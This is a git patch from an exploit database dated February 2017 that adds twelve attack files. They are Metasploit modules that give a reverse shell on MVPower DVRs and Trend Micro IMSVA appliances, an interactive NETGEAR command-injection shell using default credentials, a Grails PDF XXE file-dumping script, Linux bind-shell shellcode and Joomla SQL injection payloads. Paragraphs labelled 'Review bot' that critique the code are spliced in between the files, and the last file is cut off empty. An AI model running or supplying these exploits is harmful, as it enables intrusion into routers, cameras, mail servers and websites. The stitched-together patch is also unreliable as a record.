From 026ded7298a653238436b01b64b647702ece686f Mon Sep 17 00:00:00 2001 
From: Offensive Security
Date: Tue, 28 Feb 2017 05:01:17 +0000
Subject: [PATCH] DB: 2017-02-28

12 new exploits

MVPower DVR TV-7104HE 1.8.4 115215B9 - Shell Unauthenticated Command Execution (Metasploit)
Windows x86 - Executable Directory Search Shellcode (130 bytes)
Linux/x86_64 - Random Listener Shellcode (54 bytes)
NETGEAR DGN2200v1/v2/v3/v4 - 'dnslookup.cgi' Remote Command Execution
Joomla! Component Gnosis 1.1.2 - 'id' Parameter SQL Injection
Trend Micro InterScan Messaging Security (Virtual Appliance) - Remote Code Execution (Metasploit)
Joomla! Component Appointments for JomSocial 3.8.1 - SQL Injection
Joomla! Component My MSG 3.2.1 - SQL Injection
Joomla! Component Spinner 360 1.3.0 - SQL Injection
Joomla! Component JomSocial - SQL Injection
Grails PDF Plugin 0.6 - XML External Entity Injection
Joomla! Component OneVote! 1.0 - SQL Injection
---
files.csv | 12 ++
platforms/arm/remote/41471.rb | 97 +++++++++++++++
platforms/hardware/webapps/41459.py | 40 ++++++
platforms/java/webapps/41466.py | 140 +++++++++++++++++++++
platforms/lin_x86-64/shellcode/41468.nasm | 73 +++++++++++
platforms/multiple/webapps/41461.rb | 144 ++++++++++++++++++++++
platforms/php/webapps/41460.txt | 17 +++
platforms/php/webapps/41462.txt | 22 ++++
platforms/php/webapps/41463.txt | 22 ++++
platforms/php/webapps/41464.txt | 17 +++
platforms/php/webapps/41465.txt | 20 +++
platforms/php/webapps/41470.txt | 18 +++
platforms/win_x86/shellcode/41467.c | 90 ++++++++++++++
13 files changed, 712 insertions(+)
create mode 100755 platforms/arm/remote/41471.rb
create mode 100755 platforms/hardware/webapps/41459.py
create mode 100755 platforms/java/webapps/41466.py
create mode 100755 platforms/lin_x86-64/shellcode/41468.nasm
create mode 100755 platforms/multiple/webapps/41461.rb
create mode 100755 platforms/php/webapps/41460.txt
create mode 100755 platforms/php/webapps/41462.txt
create mode 100755 platforms/php/webapps/41463.txt
create mode 100755 platforms/php/webapps/41464.txt
create mode 100755 platforms/php/webapps/41465.txt
create mode 100755 platforms/php/webapps/41470.txt
create mode 100755 platforms/win_x86/shellcode/41467.c

diff --git a/files.csv b/files.csv
index bb5162131..5338845f8 100644
--- a/files.csv
+++ b/files.csv
@@ -15300,6 +15300,7 @@ id,file,description,date,author,platform,type,port
 41366,platforms/java/remote/41366.java,"OpenText Documentum D2 - Remote Code Execution",2017-02-15,"Andrey B. Panfilov",java,remote,0
 41436,platforms/windows/remote/41436.py,"Disk Savvy Enterprise 9.4.18 - Buffer Overflow (SEH)",2017-02-22,"Peter Baris",windows,remote,0
 41443,platforms/macos/remote/41443.html,"macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution and Arbitrary File Read",2017-02-23,"Google Security Research",macos,remote,0
+41471,platforms/arm/remote/41471.rb,"MVPower DVR TV-7104HE 1.8.4 115215B9 - Shell Unauthenticated Command Execution (Metasploit)",2017-02-27,Metasploit,arm,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -15917,6 +15918,8 @@ id,file,description,date,author,platform,type,port
 41398,platforms/linux/shellcode/41398.nasm,"Linux - Reverse Shell Shellcode (66 bytes)",2017-02-19,"Robert L. Taylor",linux,shellcode,0
 41403,platforms/lin_x86/shellcode/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,"Krzysztof Przybylski",lin_x86,shellcode,0
 41439,platforms/linux/shellcode/41439.c,"Linux/x86-64 - Egghunter Shellcode (38 bytes)",2017-02-23,odzhancode,linux,shellcode,0
+41467,platforms/win_x86/shellcode/41467.c,"Windows x86 - Executable Directory Search Shellcode (130 bytes)",2017-02-26,"Krzysztof Przybylski",win_x86,shellcode,0
+41468,platforms/lin_x86-64/shellcode/41468.nasm,"Linux/x86_64 - Random Listener Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",lin_x86-64,shellcode,0
 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@@ -37375,3 +37378,12 @@ id,file,description,date,author,platform,type,port
 41453,platforms/multiple/webapps/41453.html,"Apple WebKit 10.0.2 - 'Frame::setDocument' Universal Cross-Site Scripting",2017-02-24,"Google Security Research",multiple,webapps,0
 41455,platforms/php/webapps/41455.txt,"memcache-viewer - Cross-Site Scripting",2017-02-24,HaHwul,php,webapps,0
 41456,platforms/php/webapps/41456.txt,"Joomla! Component Intranet Attendance Track 2.6.5 - SQL Injection",2017-02-25,"Ihsan Sencan",php,webapps,0
+41459,platforms/hardware/webapps/41459.py,"NETGEAR DGN2200v1/v2/v3/v4 - 'dnslookup.cgi' Remote Command Execution",2017-02-25,SivertPL,hardware,webapps,0
+41460,platforms/php/webapps/41460.txt,"Joomla! Component Gnosis 1.1.2 - 'id' Parameter SQL Injection",2017-02-25,"Ihsan Sencan",php,webapps,0
+41461,platforms/multiple/webapps/41461.rb,"Trend Micro InterScan Messaging Security (Virtual Appliance) - Remote Code Execution (Metasploit)",2017-01-15,"Mehmet Ince",multiple,webapps,0
+41462,platforms/php/webapps/41462.txt,"Joomla! Component Appointments for JomSocial 3.8.1 - SQL Injection",2017-02-25,"Ihsan Sencan",php,webapps,0
+41463,platforms/php/webapps/41463.txt,"Joomla! Component My MSG 3.2.1 - SQL Injection",2017-02-25,"Ihsan Sencan",php,webapps,0
+41464,platforms/php/webapps/41464.txt,"Joomla! Component Spinner 360 1.3.0 - SQL Injection",2017-02-25,"Ihsan Sencan",php,webapps,0
+41465,platforms/php/webapps/41465.txt,"Joomla! Component JomSocial - SQL Injection",2017-02-25,"Ihsan Sencan",php,webapps,0
+41466,platforms/java/webapps/41466.py,"Grails PDF Plugin 0.6 - XML External Entity Injection",2017-02-21,"Charles Fol",java,webapps,0
+41470,platforms/php/webapps/41470.txt,"Joomla! Component OneVote! 1.0 - SQL Injection",2017-02-27,"Ihsan Sencan",php,webapps,0
diff --git a/platforms/arm/remote/41471.rb b/platforms/arm/remote/41471.rb
new file mode 100755
index 000000000..d91ddffef
--- /dev/null
+++ b/platforms/arm/remote/41471.rb
@@ -0,0 +1,97 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + + HttpFingerprint = { :pattern => [ /JAWS\/1\.0/ ] } + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'MVPower DVR Shell Unauthenticated Command Execution', + 'Description' => %q{ + This module exploits an unauthenticated remote command execution + vulnerability in MVPower digital video recorders. The 'shell' file + on the web interface executes arbitrary operating system commands in + the query string. + + This module was tested successfully on a MVPower model TV-7104HE with + firmware version 1.8.4 115215B9 (Build 2014/11/17). + + The TV-7108HE model is also reportedly affected, but untested. + }, + 'Author' => + [ + 'Paul Davies (UHF-Satcom)', # Initial vulnerability discovery and PoC + 'Andrew Tierney (Pen Test Partners)', # Independent vulnerability discovery and PoC + 'Brendan Coles ' # Metasploit + ], + 'License' => MSF_LICENSE, + 'Platform' => 'linux', + 'References' => + [ + # Comment from Paul Davies contains probably the first published PoC + [ 'URL', 'https://labby.co.uk/cheap-dvr-teardown-and-pinout-mvpower-hi3520d_v1-95p/' ], + # Writeup with PoC by Andrew Tierney from Pen Test Partners + [ 'URL', 'https://www.pentestpartners.com/blog/pwning-cctv-cameras/' ] + ], + 'DisclosureDate' => 'Aug 23 2015', + 'Privileged' => true, # BusyBox + 'Arch' => ARCH_ARMLE, + 'DefaultOptions' => + { + 'PAYLOAD' => 'linux/armle/mettle_reverse_tcp', + 'CMDSTAGER::FLAVOR' => 'wget' + }, + 'Targets' => + [ + ['Automatic', {}] + ], + 'CmdStagerFlavor' => %w{ echo printf wget }, + 'DefaultTarget' => 0)) + end + + def check + begin + fingerprint = Rex::Text::rand_text_alpha(rand(10) + 6) + res = send_request_cgi( + 'uri' => 
"/shell?echo+#{fingerprint}", + 'headers' => { 'Connection' => 'Keep-Alive' } + ) + if res && res.body.include?(fingerprint) + return CheckCode::Vulnerable + end + rescue ::Rex::ConnectionError + return CheckCode::Unknown + end + CheckCode::Safe + end + + def execute_command(cmd, opts) + begin + send_request_cgi( + 'uri' => "/shell?#{Rex::Text.uri_encode(cmd, 'hex-all')}", + 'headers' => { 'Connection' => 'Keep-Alive' } + ) + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") + end + end + + def exploit + print_status("#{peer} - Connecting to target") + + unless check == CheckCode::Vulnerable + fail_with(Failure::Unknown, "#{peer} - Target is not vulnerable") + end + + print_good("#{peer} - Target is vulnerable!") + + execute_cmdstager(linemax: 1500) + end +end \ No newline at end of file diff --git a/platforms/hardware/webapps/41459.py b/platforms/hardware/webapps/41459.py new file mode 100755 index 000000000..e8837050c --- /dev/null +++ b/platforms/hardware/webapps/41459.py 
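Review bot: `check` reports CheckCode::Safe when the target returns no response at all, because `if res && res.body.include?(fingerprint)` simply falls through to the trailing `CheckCode::Safe` on a nil `res` (a timeout or a closed connection that does not raise Rex::ConnectionError), so an unresponsive device is classified as "not vulnerable" rather than "unknown"; add `return CheckCode::Unknown unless res` before the body check. The `rescue` only covers `::Rex::ConnectionError`, which is consistent with `execute_command`, but worth stating in a comment since other Rex exceptions will propagate. Also note in a comment above `check` that it is an active probe, not a banner match: `# NOTE: check executes an echo through the same /shell endpoint; it leaves a request in the device's web log`, so operators reading the module know the check itself touches the target.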
@@ -0,0 +1,40 @@ +#!/usr/bin/python + +#Provides access to default user account, privileges can be easily elevated by using either: +# - a kernel exploit (ex. memodipper was tested and it worked) +# - by executing /bin/bd (suid backdoor present on SOME but not all versions) +# - by manipulating the httpd config files to trick the root user into executing your code (separate advisory will be released soon) + +#Pozdrawiam: Kornela, Komara i Sknerusa + +import sys +import requests + +#You can change these credentials to ex. Gearguy/Geardog or Guest/Guest which are hardcoded on SOME firmware versions +#These routers DO NOT support telnet/ssh access so you can use this exploit to access the shell if you want to + +login = 'admin' +password = 'password' + +def main(): + if len(sys.argv) < 2: + print "./netgearpwn_2.py " + return + spawnShell() + +def execute(cmd): #Escaping basic sanitization + requests.post("http://" + sys.argv[1] + "/dnslookup.cgi", data={'host_name':"www.google.com; " + cmd, 'lookup': "Lookup"}, auth=(login, password)) + return + +def spawnShell(): + print "Dropping a shell-like environment (blind OS injection)" + print "To test it type 'reboot'" + while True: + cmd = raw_input("[blind $] ") + execute(cmd) + +if __name__ == "__main__": + main() + +#2017-02-25 by SivertPL +#Tak, to ja. diff --git a/platforms/java/webapps/41466.py b/platforms/java/webapps/41466.py new file mode 100755 index 000000000..4d686172a --- /dev/null +++ b/platforms/java/webapps/41466.py 
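Review bot: `execute` calls `requests.post` with no timeout and no exception handling, so the first connection failure or reset inside the `while True` loop in `spawnShell` terminates the script with a raw traceback instead of a message; pass `timeout=` and wrap the call in `try/except requests.exceptions.RequestException`. The usage message in `main` is `"./netgearpwn_2.py "` with nothing after the script name — presumably a `<target>` placeholder was lost when the file was rendered, but as committed the string tells the user nothing about the missing argument, and the file name in it does not match `41459.py` either. `execute` also discards the response object, so an HTTP 401 from wrong credentials looks identical to a successful request in the "blind" loop; checking `status_code` and printing it would make failures diagnosable. The script is Python 2 (`print` statement, `raw_input`) but carries a bare `#!/usr/bin/python` shebang; `#!/usr/bin/python2` would document that.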
@@ -0,0 +1,140 @@ +# Exploit Title: Grails PDF Plugin 0.6 XXE +# Date: 21/02/2017 +# Vendor Homepage: http://www.grails.org/plugin/pdf +# Software Link: https://github.com/aeischeid/grails-pdfplugin +# Exploit Author: Charles FOL +# Contact: https://twitter.com/ambionics +# Website: https://www.ambionics.io/blog/grails-pdf-plugin-xxe +# Version: 0.6 +# CVE : N/A + + +1. dump_file.py + +#!/usr/bin/python3 +# Grails PDF Plugin XXE +# cf +# https://www.ambionics.io/blog/grails-pdf-plugin-xxe + +import requests +import sys +import os + +# Base URL of the Grails target +URL = 'http://10.0.0.179:8080/grailstest' +# "Bounce" HTTP Server +BOUNCE = 'http://10.0.0.138:7777/' + + +session = requests.Session() +pdfForm = '/pdf/pdfForm?url=' +renderPage = 'render.html' + +if len(sys.argv) < 0: + print('usage: ./%s ' % sys.argv[0]) + print('e.g.: ./%s file:///etc/passwd' % sys.argv[0]) + exit(0) + +resource = sys.argv[1] + +# Build the full URL +full_url = URL + pdfForm + pdfForm + BOUNCE + renderPage +full_url += '&resource=' + sys.argv[1] + +r = requests.get(full_url, allow_redirects=False) + +#print(full_url) + +if r.status_code != 200: + print('Error: %s' % r) +else: + with open('/tmp/file.pdf', 'wb') as handle: + handle.write(r.content) + os.system('pdftotext /tmp/file.pdf') + with open('/tmp/file.txt', 'r') as handle: + print(handle.read(), end='') + + +2. server.py + +#!/usr/bin/python3 +# Grails PDF Plugin XXE +# cf +# https://www.ambionics.io/blog/grails-pdf-plugin-xxe +# +# Server part of the exploitation +# +# Start it in an empty folder: +# $ mkdir /tmp/empty +# $ mv server.py /tmp/empty +# $ /tmp/empty/server.py + +import http.server +import socketserver +import sys + + +BOUNCE_IP = '10.0.0.138' +BOUNCE_PORT = int(sys.argv[1]) if len(sys.argv) > 1 else 80 + +# Template for the HTML page +template = """ + + + "> + +%dtd; +]> + + + + + +
&all;
+ +""" + +# The external DTD trick allows us to get more files; they would've been +invalid +# otherwise +# See: https://www.vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf +dtd = """ + +""" + +# Really hacky. When the render.html page is requested, we extract the +# 'resource=XXX' part of the URL and create an HTML file which XXEs it. +class GetHandler(http.server.SimpleHTTPRequestHandler): + def do_GET(self): + if 'render.html' in self.path: + resource = self.path.split('resource=')[1] + print('Resource: %s' % resource) + page = template + page = page.replace('[RESOURCE]', resource) + page = page.replace('[BOUNCE]', '%s:%d' % (BOUNCE_IP, +BOUNCE_PORT)) + + with open('render.html', 'w') as handle: + handle.write(page) + + return super().do_GET() + + +Handler = GetHandler +httpd = socketserver.TCPServer(("", BOUNCE_PORT), Handler) + +with open('out.dtd', 'w') as handle: + handle.write(dtd) + +print("Started HTTP server on port %d, press Ctrl-C to exit..." % +BOUNCE_PORT) +try: + httpd.serve_forever() +except KeyboardInterrupt: + print("Keyboard interrupt received, exiting.") + httpd.server_close() + + diff --git a/platforms/lin_x86-64/shellcode/41468.nasm b/platforms/lin_x86-64/shellcode/41468.nasm new file mode 100755 index 000000000..2d436e4ee --- /dev/null +++ b/platforms/lin_x86-64/shellcode/41468.nasm 
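Review bot: the argument guard in dump_file.py, `if len(sys.argv) < 0:`, can never be true, so running the script with no argument skips the usage text and dies with an IndexError at `resource = sys.argv[1]`; the condition should be `if len(sys.argv) < 2:`. `resource` is assigned but never used — the URL is built from `sys.argv[1]` again two lines later — so one of the two should go. dump_file.py also writes to the fixed paths `/tmp/file.pdf` and `/tmp/file.txt` and runs `os.system('pdftotext /tmp/file.pdf')` on them; a predictable name in a shared `/tmp` is a classic symlink hazard, and `tempfile.mkstemp()` with `subprocess.run([...])` avoids both that and the shell round-trip. In server.py, `self.path.split('resource=')[1]` raises IndexError for any `render.html` request that lacks the parameter, which kills that handler; guard it with a length check. The markup of the `template` and `dtd` heredocs appears to have been stripped in this rendering (the lines around `&all;` and `%dtd;` are bare), so their contents cannot be reviewed here.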
@@ -0,0 +1,73 @@ +;The MIT License (MIT) + +;Copyright (c) 2017 Robert L. Taylor + +;Permission is hereby granted, free of charge, to any person obtaining a +;copy of this software and associated documentation files (the “Software”), +;to deal in the Software without restriction, including without limitation +;the rights to use, copy, modify, merge, publish, distribute, sublicense, +;and/or sell copies of the Software, and to permit persons to whom the +;Software is furnished to do so, subject to the following conditions: + +;The above copyright notice and this permission notice shall be included +;in all copies or substantial portions of the Software. + +;The Software is provided “as is”, without warranty of any kind, express or +;implied, including but not limited to the warranties of merchantability, +;fitness for a particular purpose and noninfringement. In no event shall the +;authors or copyright holders be liable for any claim, damages or other +;liability, whether in an action of contract, tort or otherwise, arising +;from, out of or in connection with the software or the use or other +;dealings in the Software. +; +; For a detailed explanation of this shellcode see my blog post: +; http://a41l4.blogspot.ca/2017/02/shellrandomlisten1434.html + +global _start + +section .text + +_start: +; Socket + push 41 + pop rax + push 2 + pop rdi + push 1 + pop rsi + cdq + syscall +; Listen + xor esi,esi + xchg eax,edi + mov al,50 + syscall +; Accept + mov al,43 + syscall +; Dup 2 + push 3 + pop rsi + xchg edi,eax +dup2loop: + push 33 + pop rax + dec esi + syscall + jne dup2loop +; Execve + ; rax and rsi and rdx are zero already + push rax ; zero terminator for the following string that we are pushing + + ; push /bin//sh in reverse + mov rbx, '/bin//sh' + push rbx + + ; store /bin//sh address in RDI + push rsp + pop rdi + + ; Call the Execve syscall + mov al, 59 + syscall + \ No newline at end of file 
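Review bot: the `; Listen` section issues syscall 50 on a socket that was never bound (there is no syscall 49 anywhere in the hunk), which is what makes the port "random" in the title, but the comment does not say so; suggest `; no bind(): listen() on an unbound socket makes the kernel auto-bind INADDR_ANY on an ephemeral port`. The `jne dup2loop` after `syscall` depends on the flags set by `dec esi` surviving the system call, which holds on x86-64 Linux because `syscall` saves RFLAGS in R11 and `sysret` restores it, and a one-line comment stating that would help a reader who expects the kernel to clobber flags. The `; Execve` comment `rax and rsi and rdx are zero already` is accurate only because the last `dup2` returned 0 into rax and the loop ran `esi` down to 0; spelling that out would make the dependency on the loop's exit state explicit.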
diff --git a/platforms/multiple/webapps/41461.rb b/platforms/multiple/webapps/41461.rb
new file mode 100755
index 000000000..fbdce0994
--- /dev/null
+++ b/platforms/multiple/webapps/41461.rb
@@ -0,0 +1,144 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Trend Micro InterScan Messaging Security (Virtual Appliance) Remote Code Execution', + 'Description' => %q{ + This module exploits a command injection vulnerability in the Trend Micro + IMSVA product. An authenticated user can execute a terminal command under + the context of the web server user which is root. Besides, default installation + of IMSVA comes with a default administrator credentials. + saveCert.imss endpoint takes several user inputs and performs blacklisting. + After that it use them as argument of predefined operating system command + without proper sanitation. However,due to improper blacklisting rule it's possible to inject + arbitrary commands into it. InterScan Messaging Security prior to 9.1.-1600 affected by this issue. + This module was tested against IMSVA 9.1-1600. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Mehmet Ince ' # discovery & msf module + ], + 'References' => + [ + ['URL', 'https://pentest.blog/advisory-trend-micro-interscan-messaging-security-virtual-appliance-remote-code-execution/'] + ], + 'Privileged' => true, + 'Payload' => + { + 'Space' => 1024, + 'DisableNops' => true, + 'BadChars' => "\x2f\x22" + }, + 'DefaultOptions' => + { + 'SSL' => true, + 'payload' => 'python/meterpreter/reverse_tcp', + }, + 'Platform' => ['python'], + 'Arch' => ARCH_PYTHON, + 'Targets' => [ ['Automatic', {}] ], + 'DisclosureDate' => 'Jan 15 2017', + 'DefaultTarget' => 0 + )) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The target URI of the Trend Micro IMSVA', '/']), + OptString.new('USERNAME', [ true, 'The username for authentication', 'admin' ]), + OptString.new('PASSWORD', [ true, 'The password for authentication', 'imsva' ]), + Opt::RPORT(8445) + ] + ) + end + + def login + + user = datastore['USERNAME'] + pass = datastore['PASSWORD'] + + print_status("Attempting to login with #{user}:#{pass}") + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'login.imss'), + 'vars_post' => { + 'userid' => user, + 'pwdfake' => Rex::Text::encode_base64(pass) + } + }) + + if res && res.body.include?("The user name or password you entered is invalid") + fail_with(Failure::NoAccess, "#{peer} - Login with #{user}:#{pass} failed...") + end + + cookie = res.get_cookies + if res.code == 302 && cookie.include?("JSESSIONID") + jsessionid = cookie.scan(/JSESSIONID=(\w+);/).flatten.first + print_good("Authenticated as #{user}:#{pass}") + return jsessionid + end + + nil + end + + def exploit + + jsessionid = login + + unless jsessionid + fail_with(Failure::Unknown, 'Unable to obtain the cookie session ID') + end + + # Somehow java stores last visited url on session like viewstate! + # Visit form before submitting it. Otherwise, it will cause a crash. 
+ + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'initCert.imss'), + 'cookie' => "JSESSIONID=#{jsessionid}" + }) + + if !res or !res.body.include?("Transport Layer Security") + fail_with(Failure::Unknown, 'Unable to visit initCert.imss') + end + + # Random string that will be used as a cert name, state, email etc. + r = Rex::Text::rand_text_alphanumeric(5) + + print_status("Delivering payload...") + + # Since double quote are blacklisted, we are using Single, Backslash, Single, Single on our payload. Thanks to @wvu !!! + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'saveCert.imss'), + 'cookie' => "JSESSIONID=#{jsessionid}", + 'vars_get' => { + 'mode' => 0 + }, + 'vars_post' => { + 'certName' => r, + 'certType' => 0, + 'keyLength' => 2048, + 'countryCode' => 'TR', + 'state' => r, + 'locality' => r, + 'org' => r, + 'orgUnit' => r, + 'commonName' => "#{r}';python -c '#{payload.encoded.gsub("'", "'\\\\''")}' #", + 'emailAddress' => "#{r}@mail.com", + 'validDays' => '', + 'id' => '', + } + }) + end + +end diff --git a/platforms/php/webapps/41460.txt b/platforms/php/webapps/41460.txt new file mode 100755 index 000000000..76e461371 --- /dev/null +++ b/platforms/php/webapps/41460.txt @@ -0,0 +1,17 @@ +# # # # # +# Exploit Title: Joomla! Component Gnosis v1.1.2 - SQL Injection +# Google Dork: inurl:index.php?option=com_gnosis +# Date: 25.02.2017 +# Vendor Homepage: http://hypermodern.org/ +# Software : https://extensions.joomla.org/extensions/extension/directory-a-documentation/glossary/gnosis/ +# Demo: http://gnosis.hypermodern.org/index.php/dictionary +# Version: 1.1.2 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/index.php?option=com_gnosis&view=tags&id=[SQL] +# # # # # \ No newline at end of file 
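Review bot: `login` dereferences `res` unconditionally at `cookie = res.get_cookies` even though the preceding `if res && ...` acknowledges that `send_request_cgi` can return nil, so a timed-out login ends in a NoMethodError instead of a clean failure; add `fail_with(Failure::Unreachable, "#{peer} - No response to login request") unless res` before it. `print_status("Attempting to login with #{user}:#{pass}")` and the `print_good` / `fail_with` messages echo the password into the console and any log, which is unnecessary for a datastore value the operator already set; log only the username. `if !res or !res.body.include?(...)` in `exploit` mixes `or` with `!`; `unless res && res.body.include?("Transport Layer Security")` matches the style used in `login`. `exploit` also never inspects the response to the final `saveCert.imss` request, so a blacklisting change on the appliance would fail silently; the hunk is the end of `exploit` and the class.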
diff --git a/platforms/php/webapps/41462.txt b/platforms/php/webapps/41462.txt
new file mode 100755
index 000000000..d94380129
--- /dev/null
+++ b/platforms/php/webapps/41462.txt
@@ -0,0 +1,22 @@
+# # # # #
+# Exploit Title: Joomla! Component Appointments for JomSocial v3.8.1 - SQL Injection
+# Google Dork: N/A
+# Date: 25.02.2017
+# Vendor Homepage: https://www.cmsplugin.com/
+# Software : https://www.cmsplugin.com/products/components/1-appointments-for-jomsocial
+# Demo: http://extensions.cmsplugin.com/extensions/j3demo/my-appointments/
+# Version: 3.8.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# Login as regular user
+# http://localhost/[PATH]/my-appointments/viewappointment?id=[SQL]
+# http://localhost/[PATH]/my-appointments/my-appointments/edit?id=[SQL]
+# '+order+by+10-- -
+# Etc...
+# # # # #
+
diff --git a/platforms/php/webapps/41463.txt b/platforms/php/webapps/41463.txt
new file mode 100755
index 000000000..c713b16ac
--- /dev/null
+++ b/platforms/php/webapps/41463.txt
@@ -0,0 +1,22 @@
+# # # # #
+# Exploit Title: Joomla! Component My MSG v3.2.1 - SQL Injection
+# Google Dork: N/A
+# Date: 25.02.2017
+# Vendor Homepage: https://www.cmsplugin.com/
+# Software : https://www.cmsplugin.com/products/components/10-my-msg
+# Demo: http://extensions.cmsplugin.com/extensions/j3demo/my-msg
+# Version: 3.2.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# Login as regular user
+# http://localhost/[PATH]/index.php?option=com_mymsg&layout=edit&reply_id=[SQL]
+# http://localhost/[PATH]/index.php?option=com_mymsg&view=msg&filter_box=[SQL]
+# http://localhost/[PATH]/index.php?option=com_mymsg&view=mymsg&Ihsan_Sencan=[SQL]
+# '+order+by+10-- -
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41464.txt b/platforms/php/webapps/41464.txt
new file mode 100755
index 000000000..5810ee1d6
--- /dev/null
+++ b/platforms/php/webapps/41464.txt
@@ -0,0 +1,17 @@
+# # # # #
+# Exploit Title: Joomla! Component Spinner 360 v1.3.0 - SQL Injection
+# Google Dork: N/A
+# Date: 25.02.2017
+# Vendor Homepage: https://www.cmsplugin.com/
+# Software : https://www.cmsplugin.com/products/components/13-spinner360
+# Demo: http://extensions.cmsplugin.com/extensions/j3demo/spinner-360
+# Version: 1.3.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/spinner-360?Ihsan_Sencan=[SQL]
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41465.txt b/platforms/php/webapps/41465.txt
new file mode 100755
index 000000000..0bfd96327
--- /dev/null
+++ b/platforms/php/webapps/41465.txt
@@ -0,0 +1,20 @@
+# # # # #
+# Exploit Title: Joomla! Component JomSocial - SQL Injection
+# Google Dork: N/A
+# Date: 25.02.2017
+# Vendor Homepage: https://www.cmsplugin.com/
+# Software : http://extensions.cmsplugin.com/extensions/j3demo/jomsocial
+# Demo: http://extensions.cmsplugin.com/extensions/j3demo/jomsocial
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# Login as regular user
+# http://localhost/[PATH]/groups/?IhsanSencan=[SQL]
+# http://localhost/[PATH]/videos/?IhsanSencan=[SQL]
+# http://localhost/[PATH]/events/?IhsanSencan=[SQL]
+# # # # #
diff --git a/platforms/php/webapps/41470.txt b/platforms/php/webapps/41470.txt
new file mode 100755
index 000000000..87cd52a4b
--- /dev/null
+++ b/platforms/php/webapps/41470.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Joomla! Component OneVote! v1.0 - SQL Injection
+# Google Dork: inurl:index.php?option=com_onevote
+# Date: 27.02.2017
+# Vendor Homepage: http://advcomsys.com/
+# Software: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/polls/onevote/
+# Demo: http://advcomsys.com/index.php/joomla-demos/elections
+# Version: 1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/components/com_onevote/results.php?election_id=[SQL]
+# +/*!50000union*/+select+@@version-- -
+# # # # #
diff --git a/platforms/win_x86/shellcode/41467.c b/platforms/win_x86/shellcode/41467.c
new file mode 100755
index 000000000..40359279d
--- /dev/null
+++ b/platforms/win_x86/shellcode/41467.c
